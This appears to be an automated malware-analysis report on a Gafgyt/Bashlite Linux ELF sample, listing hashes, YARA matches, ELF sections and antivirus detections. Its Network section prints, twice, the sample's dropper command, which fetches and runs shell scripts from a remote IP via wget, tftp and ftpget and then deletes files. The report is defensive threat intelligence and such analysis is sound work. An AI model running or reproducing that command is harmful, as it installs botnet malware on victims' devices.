Binary
ABI ELFOSABI_SYSV
Size 73.81KB
Type ET_EXEC
trid 50.1% ELF Executable and Linkable format
49.8% ELF Executable and Linkable format
type ELF
Wordsize 32
Architecture x86
Hashes
md5 08c3bf87ff0a26ac3e65f10ff1516655
sha1 6c6f425b13c6af72870d55c56574f00421d4e3fa
crc32 0x391a74f7
sha224 fdd8ee63366209b306a2414b070bf995c6ed84777139559cd682efa5
sha256 0a87649048685b881f1ec96cc1ed9f2d9e6629e62bb0337b39633da9e3284c8f
sha384 bee304b66f5f99cc1b164a88ad86c467c3929b2b9d6efc625efae4459e620ee16f3098bba81560b80ab9f10bacfa1022
sha512 2c3bed47ea246e930bbf8a6b45b4e47d3586ae2a77d16640e6fc288695714b8a02fe55937d501960fe852b85b7025ea019b993c36ec0613d01eab8f447b26a6d
ssdeep 1536:xyq93lguLYiPvoVjRWSbXJ0rWlC/kPstVkYFWw23fQW83LZ5:p3KwYiPvoVjRWSbLQ/kPstVkjw2IN
Community
Report #768
Creation Date: Oct. 19, 2019, 5:05 p.m.
Last Update: Oct. 19, 2019, 5:05 p.m.
File: 0a87649048685b881f1ec96cc1ed9f2d9e6629e62bb0337b39633da9e3284c8f
Results:
Google False
HashLib False
YARA
Matches maldoc_getEIP_method_1, domain, url, IP, contentis_base64, is__elf
Suspicious True
Dwarf
List
Number 0
Files
Sys Home
Proc /proc/cpuinfo, /proc/net/route
Password
Suspicious True
Flags
Flags 0
Packer
List None
Packed False
Network
IPs cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://104.238.165.76/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 104.238.165.76 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 104.238.165.76; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 104.238.165.76 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *; exit, 104.238.165.76:23
URLs cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://104.238.165.76/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 104.238.165.76 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 104.238.165.76; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 104.238.165.76 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *; exit
Mails
Suspicious True
Strings
List
Symbols
List
Number 624
Reason None
Suspicious False
Version
Version EV_CURRENT
Foremost
Matches None
Suspicious False
Sections
List .init, .text, .fini, .rodata, .eh_frame, .ctors, .dtors, .jcr, .got.plt, .data, .bss, .comment, .shstrtab, .symtab, .strtab
Number 16
Suspicious False
Segments
Number 3
Suspicious False
Compilers
List GCC: (GNU) 4.1.2
Identified 133
Suspicious True
Functions
List
Present True
Anti-Debug
Ptrace False
Anti-disasm False
Entry Point
Address 0x8048168
Suspicious False
Embedded ELF
List None
Identified 0
Program Header
Size 32
Number 3
Offset 52
Section Header
Size 40
Number 16
Offset 57640
AVclass
gafgyt 1
VirusTotal
md5 08c3bf87ff0a26ac3e65f10ff1516655
sha1 6c6f425b13c6af72870d55c56574f00421d4e3fa
SCANS (DETECTION RATE = 62.71%)
AVG result: ELF:DDoS-Y [Trj] update: 20170807 version: 8.0.1489.320 detected: True
CMC update: 20170805 version: 1.1.0.977 detected: False
MAX result: malware (ai score=80) update: 20170807 version: 2017.6.26.1 detected: True
Bkav update: 20170807 version: 1.3.0.9282 detected: False
K7GW update: 20170807 version: 10.20.24212 detected: False
ALYac result: Gen:Variant.Backdoor.Linux.Gafgyt.1 update: 20170807 version: 1.1.1.2 detected: True
Avast result: ELF:DDoS-Y [Trj] update: 20170807 version: 8.0.1489.320 detected: True
Avira result: DDOS/LNX.Lightaidra.ljbci update: 20170807 version: 8.3.3.4 detected: True
Baidu update: 20170807 version: 1.0.0.2 detected: False
Cyren result: ELF/Backdoor.UFDH- update: 20170807 version: 5.4.30.7 detected: True
DrWeb result: Linux.BackDoor.Fgt.373 update: 20170807 version: 7.0.28.2020 detected: True
GData result: Gen:Variant.Backdoor.Linux.Gafgyt.1 update: 20170807 version: A:25.13734B:25.10170 detected: True
Panda update: 20170807 version: 4.6.4.2 detected: False
VBA32 update: 20170803 version: 3.12.26.4 detected: False
VIPRE update: 20170807 version: 60118 detected: False
Zoner update: 20170807 version: 1.0 detected: False
AVware update: 20170807 version: 1.5.0.42 detected: False
ClamAV result: Unix.Trojan.Gafgyt-111 update: 20170807 version: 0.99.2.0 detected: True
Comodo result: UnclassifiedMalware update: 20170807 version: 27567 detected: True
F-Prot update: 20170807 version: 4.7.1.166 detected: False
Ikarus result: Trojan.Linux.Gafgyt update: 20170807 version: 0.1.5.2 detected: True
McAfee result: RDN/Generic BackDoor update: 20170807 version: 6.0.6.653 detected: True
Rising result: Backdoor.Gafgyt/Linux!1.A512 (classic) update: 20170807 version: 25.0.0.1 detected: True
Sophos result: Linux/DDoS-BI update: 20170807 version: 4.98.0 detected: True
Yandex update: 20170801 version: 5.5.1.3 detected: False
Zillya update: 20170806 version: 2.0.0.3355 detected: False
Arcabit result: Trojan.Backdoor.Linux.Gafgyt.1 update: 20170807 version: 1.0.0.817 detected: True
Tencent result: Linux.Backdoor.Gafgyt.Hpb update: 20170807 version: 1.0.0.1 detected: True
ViRobot update: 20170807 version: 2014.3.20.0 detected: False
Webroot update: 20170807 version: 1.0.0.207 detected: False
Ad-Aware result: Gen:Variant.Backdoor.Linux.Gafgyt.1 update: 20170807 version: 3.0.3.1010 detected: True
AegisLab result: Backdoor.Linux.Gafgyt!c update: 20170807 version: 4.2 detected: True
Emsisoft result: Gen:Variant.Backdoor.Linux.Gafgyt.1 (B) update: 20170807 version: 4.0.1.883 detected: True
F-Secure result: Gen:Variant.Backdoor.Linux.Gafgyt.1 update: 20170807 version: 11.0.19100.45 detected: True
Fortinet result: Linux/Gafgyt.B!tr update: 20170807 version: 5.4.247.0 detected: True
Jiangmin result: Backdoor.Linux.gbi update: 20170807 version: 16.0.100 detected: True
Kingsoft update: 20170807 version: 2013.8.14.323 detected: False
Symantec result: Linux.Lightaidra update: 20170807 version: 1.4.0.0 detected: True
nProtect update: 20170807 version: 2017-08-07.02 detected: False
AhnLab-V3 result: Linux/Gafgyt.Gen update: 20170807 version: 3.9.2.18278 detected: True
Antiy-AVL result: Trojan[Backdoor]/Linux.Gafgyt.f update: 20170807 version: 3.0.0.1 detected: True
Kaspersky result: HEUR:Backdoor.Linux.Gafgyt.ac update: 20170807 version: 15.0.1.13 detected: True
Microsoft result: DDoS:Linux/Lightaidra update: 20170807 version: 1.1.14003.0 detected: True
Qihoo-360 result: Win32/Backdoor.263 update: 20170807 version: 1.0.0.1120 detected: True
TheHacker update: 20170806 version: 6.8.0.5.1813 detected: False
ZoneAlarm result: HEUR:Backdoor.Linux.Gafgyt.ac update: 20170807 version: 1.0 detected: True
ESET-NOD32 result: a variant of Linux/Gafgyt.C update: 20170807 version: 15873 detected: True
TrendMicro result: ELF_BASHLITE.SMC update: 20170807 version: 9.862.0.1074 detected: True
WhiteArmor update: 20170731 detected: False
BitDefender result: Gen:Variant.Backdoor.Linux.Gafgyt.1 update: 20170807 version: 7.2 detected: True
K7AntiVirus update: 20170807 version: 10.20.24214 detected: False
Malwarebytes update: 20170807 version: 2.1.1.1115 detected: False
TotalDefense update: 20170807 version: 37.1.62.1 detected: False
CAT-QuickHeal result: Exploit.Linux.Shellshock.A update: 20170807 version: 14.00 detected: True
NANO-Antivirus result: Trojan.Unix.Gafgyt.eikqfj update: 20170807 version: 1.0.94.18103 detected: True
MicroWorld-eScan result: Gen:Variant.Backdoor.Linux.Gafgyt.1 update: 20170807 version: 12.0.250.0 detected: True
SUPERAntiSpyware update: 20170807 version: 5.6.0.1032 detected: False
McAfee-GW-Edition result: RDN/Generic BackDoor update: 20170807 version: v2015 detected: True
TrendMicro-HouseCall result: ELF_BASHLITE.SMC update: 20170807 version: 9.950.0.1006 detected: True
total 59
sha256 0a87649048685b881f1ec96cc1ed9f2d9e6629e62bb0337b39633da9e3284c8f
scan_id 0a87649048685b881f1ec96cc1ed9f2d9e6629e62bb0337b39633da9e3284c8f-1502107407
resource 08c3bf87ff0a26ac3e65f10ff1516655
permalink https://www.virustotal.com/file/0a87649048685b881f1ec96cc1ed9f2d9e6629e62bb0337b39633da9e3284c8f/analysis/1502107407/
positives 37
scan_date 2017-08-07 12:03:27
verbose_msg Scan finished, information embedded
response_code 1
Binary
RF confidence: 100.00%
suspicious: True
MLP confidence: 99.98%
suspicious: True
SVM confidence: 98.80%
suspicious: True